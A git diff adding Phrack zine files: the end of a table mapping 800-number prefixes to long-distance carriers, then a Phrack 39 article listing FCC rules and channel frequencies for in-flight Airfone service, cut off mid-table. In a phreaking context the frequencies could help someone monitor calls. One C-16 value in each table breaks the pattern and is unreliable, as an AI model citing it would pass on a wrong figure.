+243 ATX  AT&T-C
+244 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
+245 ATX  AT&T-C
+246 9553 SOUTHWESTERN BELL
+247 ATX  AT&T-C
+248 ATX  AT&T-C
+249 LWC  LASSMAN-WEBER COMMUNICATIONS
+251 ATX  AT&T-C
+252 ATX  AT&T-C
+253 ATX  AT&T-C
+254 TTU  TOTAL-TEL USA
+255 ATX  AT&T-C
+256 LSI  LONG DISTANCE SAVERS
+257 ATX  AT&T-C
+258 ATX  AT&T-C
+259 LSI  LONG DISTANCE SAVERS
+260 COK  COM-LINK21
+261 SCH  SCHNEIDER COMMUNICATIONS
+262 ATX  AT&T-C
+263 CAN  TELCOM CANADA
+264 LDD  LDDS COMMUNICATIONS
+265 CAN  TELCOM CANADA
+266 CSY  COM SYSTEMS
+267 CAN  TELCOM CANADA
+268 CAN  TELCOM CANADA
+269 FDG  FIRST DIGITAL NETWORK
+270 CRZ  CLEARTEL COMMUNICATIONS
+271 TRA3 TRAFFIC ROUTING ADMINISTRATION 3
+272 ATX  AT&T-C
+273 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
+274 MCI  MCI TELECOMMUNICATIONS CORPORATION
+275 ITT  MTD/UNITED STATES TRANSMISSION SYSTEMS
+276 ONE  ONE CALL COMMUNICATIONS, INC.
+277 SNT  MCI / TDD / SOUTHERNNET, INC.
+279 MAL  MIDAMERICAN
+280 ADG  ADVANTAGE NETWORK, INC.
+282 ATX  AT&T-C
+283 MCI  MCI TELECOMMUNICATIONS CORPORATION
+284 MCI  MCI TELECOMMUNICATIONS CORPORATION
+286 9147 SOUTHERN NEW ENGLAND TELEPHONE
+287 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
+288 MCI  MCI TELECOMMUNICATIONS CORPORATION
+289 MCI  MCI TELECOMMUNICATIONS CORPORATION
+292 ATX  AT&T-C
+293 PRO  PROTO-COL
+294 FDC  AFFORD A CALL
+295 ACT  ACC LONG DISTANCE CORPORATION
+296 LDW  LONG DISTANCE SERVICE, INC.
+297 ARE  AMERICAN EXPRESS TRS
+298 CNO  COMTEL OF NEW ORLEANS
+299 ATL  ATC
+302 RCCP RADIO COMMON CARRIER PAGING
+312 RCCP RADIO COMMON CARRIER PAGING
+320 CQD  CONQUEST LONG DISTANCE CORPORATION
+321 ATX  AT&T-C
+322 ATX  AT&T-C
+323 ATX  AT&T-C
+324 HNI  HOUSTON NETWORKM INC./VXVY TELECOM, INC.
+325 ATX  AT&T-C
+326 UTC  US TELCOM, INC./US SPRINT
+327 ATX  AT&T-C
+328 ATX  AT&T-C
+329 ATL  ATC
+330 ATL  ATC
+331 ATX  AT&T-C
+332 ATX  AT&T-C
+333 MCI  MCI TELECOMMUNICATIONS CORPORATION
+334 ATX  AT&T-C
+335 SCH  SCHNEIDER COMMUNICATIONS
+336 ATX  AT&T-C
+337 FDR  FIRST DATA RESOURCES
+338 ATX  AT&T-C
+339 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
+340 FFM  FIRST FINANCIAL MANAGEMENT CORPORATION
+341 ATX  AT&T-C
+342 ATX  AT&T-C
+343 ATX  AT&T-C
+344 ATX  AT&T-C
+345 ATX  AT&T-C
+346 ATX  AT&T-C
+347 UTC  US TELCOM, INC./US SPRINT
+348 ATX  AT&T-C
+349 DCT  DIRECT COMMUNICATIONS, INC.
+350 CSY  COM SYSTEMS
+351 ATX  AT&T-C
+352 ATX  AT&T-C
+353 SCH  SCHNEIDER COMMUNICATIONS
+354 ATX  AT&T-C
+355 ATZ  ATX-COMMUNICATIONS
+356 ATX  AT&T-C
+357 CNZ  CAM-NET SYSTEMS-INC.
+358 ATX  AT&T-C
+359 UTC  US TELCOM, INC./US SPRINT
+360 CWV  ?
+361 CAN  TELCOM CANADA
+362 ATX  AT&T-C
+363 CAN  TELCOM CANADA
+364 HNI  HOUSTON NETWORKM INC./VXVY TELECOM, INC.
+365 MCI  MCI TELECOMMUNICATIONS CORPORATION
+366 UTC  US TELCOM, INC./US SPRINT
+367 ATX  AT&T-C
+368 ATX  AT&T-C
+369 TDD  MCI / TELECONNECT
+370 TDD  MCI / TELECONNECT
+372 ATX  AT&T-C
+373 TDD  MCI / TELECONNECT
+374 ITG  INTERNATIONAL TELECHARGE, INC.
+375 TNO  ATC CIGNAL COMMUNICATIONS
+375 ATL  ATC
+376 ECR  ECONO-CALL LONG DISTANCE
+377 GTS  TELENET COMMUNICATIONS CORPORATION
+378 NTP  NATIONAL TELEPHONE COMPANY
+379 EMI  EASTERN MICROWAVE
+381 LMI  LONG DISTANCE OF MICHIGAN
+382 ATX  AT&T-C
+383 TDD  MCI / TELECONNECT
+384 FDT  FRIEND TECHNOLOGIES
+385 CAB  HEDGES COMMUNICATIONS /COM CABLE LAYING
+386 TBQ  TELECABLE CORPORATION
+387 CAN  TELCOM CANADA
+388 MCI  MCI TELECOMMUNICATIONS CORPORATION
+390 EBR  ECONO-CALL
+392 ATX  AT&T-C
+393 EXF  PIONEER TELEPHONE /EXECULINES OF FLORIDA
+394 TDX  CABLE & WIRELESS COMMUNICATIONS
+395 MCI  MCI TELECOMMUNICATIONS CORPORATION
+396 BOA  BANK OF AMERICA
+397 TDD  MCI / TELECONNECT
+399 ARZ  AMERICALL CORPORATION (CA)
+402 RCCP RADIO COMMON CARRIER PAGING
+412 RCCP RADIO COMMON CARRIER PAGING
+420 TGR  TMC OF SOUTHWEST FLORIDA
+421 ATX  AT&T-C
+422 ATX  AT&T-C
+423 ATX  AT&T-C
+424 ATX  AT&T-C
+425 TTH  TELE TECH, INC.
+426 ATX  AT&T-C
+427 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
+428 ATX  AT&T-C
+429 TRF  T-TEL
+431 ATX  AT&T-C
+432 ATX  AT&T-C
+433 ATX  AT&T-C
+434 AGN  AMERIGON
+435 ATX  AT&T-C
+436 IDN  INDIANA SWITCH, INC.
+437 ATX  AT&T-C
+438 ATX  AT&T-C
+439 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
+440 TXN  TEX-NET
+441 ATX  AT&T-C
+442 ATX  AT&T-C
+443 ATX  AT&T-C
+444 MCI  MCI TELECOMMUNICATIONS CORPORATION
+445 ATX  AT&T-C
+446 ATX  AT&T-C
+447 ATX  AT&T-C
+448 ATX  AT&T-C
+449 UTD  UNITED TELCO / TELAMAR
+450 USL  US LINK LONG DISTANCE
+451 ATX  AT&T-C
+452 ATX  AT&T-C
+453 ATX  AT&T-C
+454 ALN  ALLNET COMMUNICATIONS SERVICES
+455 LDG  LDD, INC.
+456 MCI  MCI TELECOMMUNICATIONS CORPORATION
+457 ATX  AT&T-C
+458 ATX  AT&T-C
+459 9631 NORTHWEST BELL
+460 NTX  NATIONAL TELEPHONE EXCHANGE
+461 CAN  TELCOM CANADA
+462 ATX  AT&T-C
+463 CAN  TELCOM CANADA
+464 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
+465 CAN  TELCOM CANADA
+466 ALN  ALLNET COMMUNICATIONS SERVICES
+467 LDD  LDDS COMMUNICATIONS
+468 ATX  AT&T-C
+469 IAS  IOWA NETWORK SERVICES
+471 ALN  ALLNET COMMUNICATIONS SERVICES
+472 ATX  AT&T-C
+473 UTC  US TELCOM, INC./US SPRINT
+474 32V1 VIRGIN ISLAND TELEPHONE
+475 TDD  MCI / TELECONNECT
+476 SNT  MCI / TDD / SOUTHERNNET, INC.
+477 MCI  MCI TELECOMMUNICATIONS CORPORATION
+478 AAM  ALASCOM
+479 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
+481 1186 GTE/NORTH
+482 ATX  AT&T-C
+483 0328 GTE/FLORIDA
+484 TDD  MCI / TELECONNECT
+485 TDD  MCI / TELECONNECT
+486 TDX  CABLE & WIRELESS COMMUNICATIONS
+487 UTC  US TELCOM, INC./US SPRINT
+488 UTC  US TELCOM, INC./US SPRINT
+489 LDD  LDDS COMMUNICATIONS
+492 ATX  AT&T-C
+493 IPC  INTERNATION PACIFIC
+494 NWR  NETWORK TELEPHONE SERVICE
+495 JNT  J-NET COMMUNICATIONS
+496 TRA3 TRAFFIC ROUTING ADMINISTRATION 3
+502 RCCP RADIO COMMON CARRIER PAGING
+512 RCCP RADIO COMMON CARRIER PAGING
+520 PCD  PENTAGON COMPUTER DATA, LTD.
+521 ATX  AT&T-C
+522 ATX  AT&T-C
+523 ATX  AT&T-C
+524 ATX  AT&T-C
+525 ATX  AT&T-C
+526 ATX  AT&T-C
+527 ATX  AT&T-C
+528 ATX  AT&T-C
+529 MIT  MIDCO COMMUNICATIONS
+530 VRT  VARTEC NATIONAL, INC.
+531 ATX  AT&T-C
+532 ATX  AT&T-C
+533 ATX  AT&T-C
+534 TRA3 TRAFFIC ROUTING ADMINISTRATION 3
+535 ATX  AT&T-C
+536 ALN  ALLNET COMMUNICATIONS SERVICES
+537 ATX  AT&T-C
+538 ATX  AT&T-C
+539 FNE  FIRST PHONE
+540 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
+541 ATX  AT&T-C
+542 ATX  AT&T-C
+543 ATX  AT&T-C
+544 ATX  AT&T-C
+545 ATX  AT&T-C
+546 UTC  US TELCOM, INC./US SPRINT
+547 ATX  AT&T-C
+548 ATX  AT&T-C
+549 CBU  CALL AMERICA
+550 CMA  CALL-AMERICA
+551 ATX  AT&T-C
+552 ATX  AT&T-C
+553 ATX  AT&T-C
+554 ATX  AT&T-C
+555 ATX  AT&T-C
+556 ATX  AT&T-C
+557 ALN  ALLNET COMMUNICATIONS SERVICES
+558 ATX  AT&T-C
+561 CAN  TELCOM CANADA
+562 ATX  AT&T-C
+563 CAN  TELCOM CANADA
+564 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
+565 CAN  TELCOM CANADA
+566 ALN  ALLNET COMMUNICATIONS SERVICES
+567 CAN  TELCOM CANADA
+568 MCI  MCI TELECOMMUNICATIONS CORPORATION
+569 TEN  TELESPHERE NETWORK
+572 ATX  AT&T-C
+574 AMM  ACCESS LONG DISTANCE
+575 AOI  UNITED COMMUNICATIONS, INC.
+577 GTS  TELENET COMMUNICATIONS CORPORATION
+579 LNS  LINTEL SYSTEMS
+580 WES  WESTEL
+582 ATX  AT&T-C
+583 TDD  MCI / TELECONNECT
+584 TDD  MCI / TELECONNECT
+586 ATC  ACTION TELECOM COMPANY
+587 LTQ  LONG DISTANCE FOR LESS
+588 ATC  ACTION TELECOM COMPANY
+589 LGT  LITEL
+592 ATX  AT&T-C
+593 TDD  MCI / TELECONNECT
+594 TDD  MCI / TELECONNECT
+595 32P1 PUERTO RICO TELEPHONE
+596 TOI  TELECOM "OPTIONS" PLUS, INC.
+599 LDM  LONG DISTANCE MANAGEMENT
+602 RCCP RADIO COMMON CARRIER PAGING
+612 RCCP RADIO COMMON CARRIER PAGING
+621 ATX  AT&T-C
+622 ATX  AT&T-C
+623 TRA3 TRAFFIC ROUTING ADMINISTRATION 3
+624 ATX  AT&T-C
+625 NLD  NATIONAL DATA CORP
+626 ATX  AT&T-C
+627 MCI  MCI TELECOMMUNICATIONS CORPORATION
+628 ATX  AT&T-C
+629 2284 BEEHIVE TELEPHONE
+631 ATX  AT&T-C
+632 ATX  AT&T-C
+633 ATX  AT&T-C
+634 ATX  AT&T-C
+635 ATX  AT&T-C
+636 CQU  CONQUEST COMMUNICATION CORPORATION
+637 ATX  AT&T-C
+638 ATX  AT&T-C
+639 BUR  BURLINGTON TEL
+640 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
+641 ATX  AT&T-C
+642 ATX  AT&T-C
+643 ATX  AT&T-C
+644 CMA  CALL-AMERICA
+645 ATX  AT&T-C
+646 UTT  UNION TELEPHONE COMPANY
+647 ATX  AT&T-C
+648 ATX  AT&T-C
+649 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
+652 ATX  AT&T-C
+654 ATX  AT&T-C
+655 ESM  EXECULINE OF SACRAMENTO, INC.
+656 AVX  AMVOX
+657 TDD  MCI / TELECONNECT
+658 TDD  MCI / TELECONNECT
+659 UTC  US TELCOM, INC./US SPRINT
+660 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
+661 CAN  TELCOM CANADA
+662 ATX  AT&T-C
+663 CAN  TELCOM CANADA
+664 MCI  MCI TELECOMMUNICATIONS CORPORATION
+665 CAN  TELCOM CANADA
+666 MCI  MCI TELECOMMUNICATIONS CORPORATION
+667 CAN  TELCOM CANADA
+668 CAN  TELCOM CANADA
+669 UTC  US TELCOM, INC./US SPRINT
+672 ATX  AT&T-C
+673 SNT  MCI / TDD / SOUTHERNNET, INC.
+674 TDD  MCI / TELECONNECT
+675 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
+676 UTC  US TELCOM, INC./US SPRINT
+677 MCI  MCI TELECOMMUNICATIONS CORPORATION
+678 MCI  MCI TELECOMMUNICATIONS CORPORATION
+679 VOB  TRANS-NET, INC.
+680 2408 PACIFIC TELCOM
+682 ATX  AT&T-C
+683 MTD  METROMEDIA LONG DISTANCE
+684 NTQ  NORTHERN TELECOM, INC.
+685 MCI  MCI TELECOMMUNICATIONS CORPORATION
+686 LGT  LITEL
+687 NTS  NTS COMMUNICATIONS
+688 MCI  MCI TELECOMMUNICATIONS CORPORATION
+689 NWS  NORTHWEST TELCO
+691 32D1 DOMIN REPUBLIC TELEPHONE
+692 ATX  AT&T-C
+693 JJJ  TRI-J
+694 TZC  TELESCAN
+695 MCI  MCI TELECOMMUNICATIONS CORPORATION
+696 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
+698 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
+699 PLG  PILGRIM TELEPHONE CO.
+702 RCCP RADIO COMMON CARRIER PAGING
+712 RCCP RADIO COMMON CARRIER PAGING
+720 TGN  TELEMANAGEMENT CONSULT'T CORP
+721 FLX  FLEX COMMUNICATIONS
+722 ATX  AT&T-C
+723 MCI  MCI TELECOMMUNICATIONS CORPORATION
+724 RTC  RCI CORPORATION
+725 ATL  ATC
+726 UTC  US TELCOM, INC./US SPRINT
+727 MCI  MCI TELECOMMUNICATIONS CORPORATION
+728 TDD  MCI / TELECONNECT
+729 UTC  US TELCOM, INC./US SPRINT
+732 ATX  AT&T-C
+733 UTC  US TELCOM, INC./US SPRINT
+734 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
+735 UTC  US TELCOM, INC./US SPRINT
+736 UTC  US TELCOM, INC./US SPRINT
+737 MEC  MERCURY, INC.
+738 MEC  MERCURY, INC.
+741 ATL  ATC
+742 ATX  AT&T-C
+743 UTC  US TELCOM, INC./US SPRINT
+744 TRA3 TRAFFIC ROUTING ADMINISTRATION 3
+745 UTC  US TELCOM, INC./US SPRINT
+746 FTC  FTC COMMUNICATIONS, INCORPORATION
+747 TDD  MCI / TELECONNECT
+748 TDD  MCI / TELECONNECT
+749 ATL  ATC
+752 ATX  AT&T-C
+753 MCI  MCI TELECOMMUNICATIONS CORPORATION
+754 TSH  TEL-SHARE
+755 UTC  US TELCOM, INC./US SPRINT
+756 MCI  MCI TELECOMMUNICATIONS CORPORATION
+757 TID  TMC OF SOUTH CENTRAL INDIANA
+759 MCI  MCI TELECOMMUNICATIONS CORPORATION
+761 ACX  ALTERNATE COMMUNICATIONS TECHNOLOGY
+762 ATX  AT&T-C
+763 TON  TOUCH & SAVE
+764 AAM  ALASCOM
+765 MCI  MCI TELECOMMUNICATIONS CORPORATION
+766 MCI  MCI TELECOMMUNICATIONS CORPORATION
+767 UTC  US TELCOM, INC./US SPRINT
+768 SNT  MCI / TDD / SOUTHERNNET, INC.
+770 3300 GENERAL COMMUNICATIONS
+771 SNT  MCI / TDD / SOUTHERNNET, INC.
+772 ATX  AT&T-C
+773 CUX  COMPU-TEL INC.
+774 TTQ  TTE OF CHARLESTON
+776 UTC  US TELCOM, INC./US SPRINT
+777 MCI  MCI TELECOMMUNICATIONS CORPORATION
+778 EDS  ELECTRONIC DATA SYSTEMS CORPORATION
+779 TDD  MCI / TELECONNECT
+780 SNT  MCI / TDD / SOUTHERNNET, INC.
+782 ATX  AT&T-C
+783 ALN  ALLNET COMMUNICATIONS SERVICES
+784 ALG  AMERICAN LONG LINE
+785 SNH  SUNSHINE TELEPHONE CO.
+786 0341 UNITED/FLORIDA
+787 MAD  MID ATLANTIC TELECOM
+788 UTC  US TELCOM, INC./US SPRINT
+789 TMU  TEL-AMERICA, INC.
+792 ATX  AT&T-C
+794 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
+797 TAM  TMC OF SOUTH CENTRAL INDIANA
+798 TDD  MCI / TELECONNECT
+800 UTC  US TELCOM, INC./US SPRINT
+802 RCCP RADIO COMMON CARRIER PAGING
+807 NTI  NETWORK TELECOMMUNICATIONS
+808 AAX  AMERITECH AUDIOTEX SERVICES
+812 RCCP RADIO COMMON CARRIER PAGING
+821 ATX  AT&T-C
+822 ATX  AT&T-C
+823 THA  TOUCH AMERICA
+824 ATX  AT&T-C
+825 MCI  MCI TELECOMMUNICATIONS CORPORATION
+826 ATX  AT&T-C
+827 UTC  US TELCOM, INC./US SPRINT
+828 ATX  AT&T-C
+829 UTC  US TELCOM, INC./US SPRINT
+831 ATX  AT&T-C
+832 ATX  AT&T-C
+833 ATX  AT&T-C
+834 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
+835 ATX  AT&T-C
+836 TDD  MCI / TELECONNECT
+837 TDD  MCI / TELECONNECT
+838 0567 UNITED/INT MN
+839 VST  STAR-LINE
+841 ATX  AT&T-C
+842 ATX  AT&T-C
+843 ATX  AT&T-C
+844 LDD  LDDS COMMUNICATIONS
+845 ATX  AT&T-C
+846 MCI  MCI TELECOMMUNICATIONS CORPORATION
+847 ATX  AT&T-C
+848 ATX  AT&T-C
+849 BTM  BUSINESS TELECOM, INC.
+850 TKC  TK COMMUNICATIONS
+851 ATX  AT&T-C
+852 ATX  AT&T-C
+853 UTY  UNIVERSAL COMMUNICATIONS
+854 ATX  AT&T-C
+855 ATX  AT&T-C
+857 TDD  MCI / TELECONNECT
+858 ATX  AT&T-C
+860 VNS  VIRTUAL NETWORK
+862 ATX  AT&T-C
+863 ALN  ALLNET COMMUNICATIONS SERVICES
+864 TEN  TELESPHERE NETWORK
+865 3100 HAWAIIAN TELEPHONE
+866 MCI  MCI TELECOMMUNICATIONS CORPORATION
+867 RBL  VORTEL
+868 SNT  MCI / TDD / SOUTHERNNET, INC.
+869 UTC  US TELCOM, INC./US SPRINT
+871 TXL  DIGITAL NETWORK, INC.
+872 ATX  AT&T-C
+873 MCI  MCI TELECOMMUNICATIONS CORPORATION
+874 ATX  AT&T-C
+875 ALN  ALLNET COMMUNICATIONS SERVICES
+876 MCI  MCI TELECOMMUNICATIONS CORPORATION
+877 UTC  US TELCOM, INC./US SPRINT
+878 ALN  ALLNET COMMUNICATIONS SERVICES
+879 MCI  MCI TELECOMMUNICATIONS CORPORATION
+880 NTV  NATIONAL TELECOMMUNICATIONS
+881 NTV  NATIONAL TELECOMMUNICATIONS
+882 ATX  AT&T-C
+883 TDX  CABLE & WIRELESS COMMUNICATIONS
+884 UTC  US TELCOM, INC./US SPRINT
+885 SDY  TELVUE,CORP
+886 ALN  ALLNET COMMUNICATIONS SERVICES
+887 ETS  EASTERN TELEPHONE SYSTEMS, INC.
+888 MCI  MCI TELECOMMUNICATIONS CORPORATION
+889 2408 PACIFIC TELCOM
+890 ATZ  ATX-COMMUNICATIONS
+891 TVT  TMC COMMUNICATIONS
+892 ATX  AT&T-C
+896 TXN  TEX-NET
+898 CGI  COMMUNICATIONS GROUP OF JACKSON
+899 TDX  CABLE & WIRELESS COMMUNICATIONS
+902 RCCP RADIO COMMON CARRIER PAGING
+908 AAX  AMERITECH AUDIOTEX SERVICES
+912 RCCP RADIO COMMON CARRIER PAGING
+922 ATX  AT&T-C
+923 ALN  ALLNET COMMUNICATIONS SERVICES
+924 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
+925 MCI  MCI TELECOMMUNICATIONS CORPORATION
+926 MCI  MCI TELECOMMUNICATIONS CORPORATION
+927 UTC  US TELCOM, INC./US SPRINT
+928 ALU  AMERICALL SYSTEMS - LOUISIANNA
+932 ATX  AT&T-C
+933 MCI  MCI TELECOMMUNICATIONS CORPORATION
+934 MCI  MCI TELECOMMUNICATIONS CORPORATION
+936 RBW  R-COMM
+937 MCI  MCI TELECOMMUNICATIONS CORPORATION
+939 TZX  TELENATIONAL COMMUNICATIONS
+940 TSF  ATC / SOUTH TEL
+942 ATX  AT&T-C
+943 AUU  AUS, INC.
+944 MCI  MCI TELECOMMUNICATIONS CORPORATION
+945 MCI  MCI TELECOMMUNICATIONS CORPORATION
+946 API  PHONE ONE - AMERICAN PIONEER TELEPHONE
+947 MCI  MCI TELECOMMUNICATIONS CORPORATION
+948 PHX  PHOENIX NETWORK
+950 MCI  MCI TELECOMMUNICATIONS CORPORATION
+951 BML  PHONE AMERICA
+952 ATX  AT&T-C
+955 MCI  MCI TELECOMMUNICATIONS CORPORATION
+960 CNO  COMTEL OF NEW ORLEANS
+962 ATX  AT&T-C
+963 SOC  STATE OF CALIFORNIA
+964 MCI  MCI TELECOMMUNICATIONS CORPORATION
+965 TLX  TMC OF LEXINGTON
+966 TDX  CABLE & WIRELESS COMMUNICATIONS
+967 MCI  MCI TELECOMMUNICATIONS CORPORATION
+968 TED  TELEDIAL AMERICA
+969 TDX  CABLE & WIRELESS COMMUNICATIONS
+972 ATX  AT&T-C
+980 VLW  VALU-LINE OF LONGVIEW, INC.
+981 32P1 PUERTO RICO TELEPHONE
+982 ATX  AT&T-C
+983 WUT  WESTERN UNION TELEGRAPH CO.
+986 WUT  WESTERN UNION TELEGRAPH CO.
+987 BTL  BITTEL TELECOMMUNICATIONS CORPORATION
+988 TDD  MCI / TELECONNECT
+989 TDX  CABLE & WIRELESS COMMUNICATIONS
+990 FEB  FEB CORPORATION
+992 ATX  AT&T-C
+993 LKS  ?
+996 VOA  VALU-LINE
+999 MCI  MCI TELECOMMUNICATIONS CORPORATION
+_______________________________________________________________________________
diff --git a/phrack39/8.txt b/phrack39/8.txt
new file mode 100644
index 0000000..18613e1
--- /dev/null
+++ b/phrack39/8.txt
@@ -0,0 +1,365 @@
+                                ==Phrack Inc.==
+
+                  Volume Four, Issue Thirty-Nine, File 8 of 13
+
+                              Air Fone Frequencies
+                               by Leroy Donnelly
+                        Leroy.Donnelly@IVGATE.OMAHUG.ORG
+
+
+This is a quick file on the subject of what frequencies are used for Air Fone
+Telephone while in-flight air-to-ground.  The following should give you some an
+understanding of how it all works.
+
+The FCC has issued rules on allocation of the 849-851/894-895 MHz bands for
+air-ground radiotelephone service.
+
+The most recent action was effective September 9, 1991:
+
+     1) Changed channel spacing from GTE Airfone Inc.'s de facto standards;
+
+     2) Ordered GTE to make its service available to other air-ground licensees
+        at non-discriminatory rates;
+
+     3) Divided each channel block into 6 control channels (P-1 through P-6)
+        and 29 communications channels (C-1 through C-29);
+
+     4) Provided for a communications channel bandwidth of 6 kHz;
+
+     5) Gave GTE 22 months to modify its current control channel scheme; during
+        this period, GTE can use the lower 20 kHz of each channel block, which
+        includes channels C-1, C-2, and C-3, for control.  GTE then has another
+        38 months during which it can only use a 3.2 kHz control channel in
+        channel C-2 of each channel block.  After these transition periods end
+        (September of 1996), GTE must switch to control channels marked P-1
+        through P-6 in the tables below;
+
+     6) Empowered the FCC to assign exclusively one control channel to each
+        air-ground licensee;
+
+     7) Limited the ERP of airborne stations to 30 watts maximum; and that of
+        ground stations to 100 watts maximum;
+ 
+     8) Limited the ERP of ground stations to 1 watt when communicating with
+        aircraft on the ground.
+
+
+GROUND TO AIR CHANNELS
+
+(NOTE:  "GB" in these listings denotes Guard Band, a series of 3 kHz spacings
+ to separate communications channels from control channels.)
+
+CH. #                         CHANNEL BLOCK
+
+               10        9         8         7         6
+C-1       849.0055  849.2055  849.4055  849.6055  849.8055
+C-2       849.0115  849.2115  849.4115  849.6115  849.8115
+C-3       849.0175  849.2175  849.4175  849.6175  849.8175
+C-4       849.0235  849.2235  849.4235  849.6235  849.8235
+C-5       849.0295  849.2295  849.4295  849.6295  849.8295
+C-6       849.0355  849.2355  849.4355  849.6355  849.8355
+C-7       849.0415  849.2415  849.4415  849.6415  849.8415
+C-8       849.0475  849.2475  849.4475  849.6475  849.8475
+C-9       849.0535  849.2535  849.4535  849.6535  849.8535
+C-10      849.0595  849.2595  849.4595  849.6595  849.8595
+C-11      849.0655  849.2655  849.4655  849.6655  849.8655
+C-12      849.0715  849.2715  849.4715  849.6715  849.8715
+C-13      849.0775  849.2775  849.4775  849.6775  849.8775
+C-14      849.0835  849.2835  849.4835  849.6835  849.8835
+C-15      849.0895  849.2895  849.4895  849.6895  849.8895
+C-16      849.0955  849.2855  849.4955  849.6955  849.8955
+C-17      849.1015  849.3015  849.5015  849.7015  849.9015
+C-18      849.1075  849.3075  849.5075  849.7075  849.9075
+C-19      849.1135  849.3135  849.5135  849.7135  849.9135
+C-20      849.1195  849.3195  849.5195  849.7195  849.9195
+C-21      849.1255  849.3255  849.5255  849.7255  849.9255
+C-22      849.1315  849.3315  849.5315  849.7315  849.9315
+C-23      849.1375  849.3375  849.5375  849.7375  849.9375
+C-24      849.1435  849.3435  849.5435  849.7435  849.9435
+C-25      849.1495  849.3495  849.5495  849.7495  849.9495
+C-26      849.1555  849.3555  849.5555  849.7555  849.9555
+C-27      849.1615  849.3615  849.5615  849.7615  849.9615
+C-28      849.1675  849.3675  849.5675  849.7675  849.9675
+C-29      849.1735  849.3735  849.5735  849.7735  849.9735
+GB        849.1765  849.3765  849.5765  849.7765  849.9765
+               to        to        to        to        to
+          849.1797  849.3797  849.5797  849.7797  849.9797
+P-6       849.1813  849.3813  849.5813  849.7813  849.9813
+P-5       849.1845  849.3845  849.5845  849.7845  849.9845
+P-4       849.1877  849.3877  849.5877  849.7877  849.9877
+P-3       849.1909  849.3909  849.5909  849.7909  849.9909
+P-2       849.1941  849.3941  849.5941  849.7941  849.9941
+P-1       849.1973  849.3973  849.5973  849.7973  849.9973
+
+
+               5         4         3         2         1
+C-1       850.0055  850.2055  850.4055  850.6055  850.8055
+C-2       850.0115  850.2115  850.4115  850.6115  850.8115
+C-3       850.0175  850.2175  850.4175  850.6175  850.8175
+C-4       850.0235  850.2235  850.4235  850.6235  850.8235
+C-5       850.0295  850.2295  850.4295  850.6295  850.8295
+C-6       850.0355  850.2355  850.4355  850.6355  850.8355
+C-7       850.0415  850.2415  850.4415  850.6415  850.8415
+C-8       850.0475  850.2475  850.4475  850.6475  850.8475
+C-9       850.0535  850.2535  850.4535  850.6535  850.8535
+C-10      850.0595  850.2595  850.4595  850.6595  850.8595
+C-11      850.0655  850.2655  850.4655  850.6655  850.8655
+C-12      850.0715  850.2715  850.4715  850.6715  850.8715
+C-13      850.0775  850.2775  850.4775  850.6775  850.8775
+C-14      850.0835  850.2835  850.4835  850.6835  850.8835
+C-15      850.0895  850.2895  850.4895  850.6895  850.8895
+C-16      850.0955  850.2855  850.4955  850.6955  850.8955
+C-17      850.1015  850.3015  850.5015  850.7015  850.9015
+C-18      850.1075  850.3075  850.5075  850.7075  850.9075
+C-19      850.1135  850.3135  850.5135  850.7135  850.9135
+C-20      850.1195  850.3195  850.5195  850.7195  850.9195
+C-21      850.1255  850.3255  850.5255  850.7255  850.9255
+C-22      850.1315  850.3315  850.5315  850.7315  850.9315
+C-23      850.1375  850.3375  850.5375  850.7375  850.9375
+C-24      850.1435  850.3435  850.5435  850.7435  850.9435
+C-25      850.1495  850.3495  850.5495  850.7495  850.9495
+C-26      850.1555  850.3555  850.5555  850.7555  850.9555
+C-27      850.1615  850.3615  850.5615  850.7615  850.9615
+C-28      850.1675  850.3675  850.5675  850.7675  850.9675
+C-29      850.1735  850.3735  850.5735  850.7735  850.9735
+GB        850.1765  850.3765  850.5765  850.7765  850.9765
+               to        to        to        to        to
+          850.1797  850.3797  850.5797  850.7797  850.9797
+P-6       850.1813  850.3813  850.5813  850.7813  850.9813
+P-5       850.1845  850.3845  850.5845  850.7845  850.9845
+P-4       850.1877  850.3877  850.5877  850.7877  850.9877
+P-3       850.1909  850.3909  850.5909  850.7909  850.9909
+P-2       850.1941  850.3941  850.5941  850.7941  850.9941
+P-1       850.1973  850.3973  850.5973  850.7973  850.9973
+
+
+AIR TO GROUND CHANNELS
+
+CH. #                         CHANNEL BLOCK
+               10        9         8         7         6
+C-1       894.0055  894.2055  894.4055  894.6055  894.8055
+C-2       894.0115  894.2115  894.4115  894.6115  894.8115
+C-3       894.0175  894.2175  894.4175  894.6175  894.8175
+C-4       894.0235  894.2235  894.4235  894.6235  894.8235
+C-5       894.0295  894.2295  894.4295  894.6295  894.8295
+C-6       894.0355  894.2355  894.4355  894.6355  894.8355
+C-7       894.0415  894.2415  894.4415  894.6415  894.8415
+C-8       894.0475  894.2475  894.4475  894.6475  894.8475
+C-9       894.0535  894.2535  894.4535  894.6535  894.8535
+C-10      894.0595  894.2595  894.4595  894.6595  894.8595
+C-11      894.0655  894.2655  894.4655  894.6655  894.8655
+C-12      894.0715  894.2715  894.4715  894.6715  894.8715
+C-13      894.0775  894.2775  894.4775  894.6775  894.8775
+C-14      894.0835  894.2835  894.4835  894.6835  894.8835
+C-15      894.0895  894.2895  894.4895  894.6895  894.8895
+C-16      894.0955  894.2855  894.4955  894.6955  894.8955
+C-17      894.1015  894.3015  894.5015  894.7015  894.9015
+C-18      894.1075  894.3075  894.5075  894.7075  894.9075
+C-19      894.1135  894.3135  894.5135  894.7135  894.9135
+C-20      894.1195  894.3195  894.5195  894.7195  894.9195
+C-21      894.1255  894.3255  894.5255  894.7255  894.9255
